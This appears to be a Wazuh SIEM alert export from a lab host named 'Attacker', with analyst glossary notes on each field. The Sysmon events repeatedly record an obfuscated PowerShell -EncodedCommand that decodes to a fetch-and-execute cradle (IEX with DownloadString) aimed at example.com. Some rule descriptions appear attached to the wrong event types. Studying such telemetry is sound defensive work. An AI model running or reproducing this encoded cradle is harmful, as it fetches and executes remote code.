decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:00.1422661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283325 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:58.891
ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ProcessId: 11360
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ParentProcessId: 5848
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:58.891 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0a-680a-190b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11360 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5848 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 47 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534230.1305341 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:00.3905368Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283335 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:00.377
ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ProcessId: 11360
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1
CreationUtcTime: 2025-04-24 22:37:00.377
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:00.377 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0a-680a-190b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11360 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gypnpqaz.wjv.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:00.377 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 44 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534230.1308110 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:02.5885586Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283390 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:01.400
ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ProcessId: 9884
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ParentProcessId: 11360
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:01.400 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11360 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 48 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1316177 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:03.0764574Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283407 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:03.058
ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ProcessId: 9884
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_01e43x2y.p5y.ps1
CreationUtcTime: 2025-04-24 22:37:03.058
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:03.058 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_01e43x2y.p5y.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:03.058 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 45 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1318942 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:06.0543381Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283457 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:04.739
ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ProcessId: 8832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00}
ParentProcessId: 9884
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:04.739 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
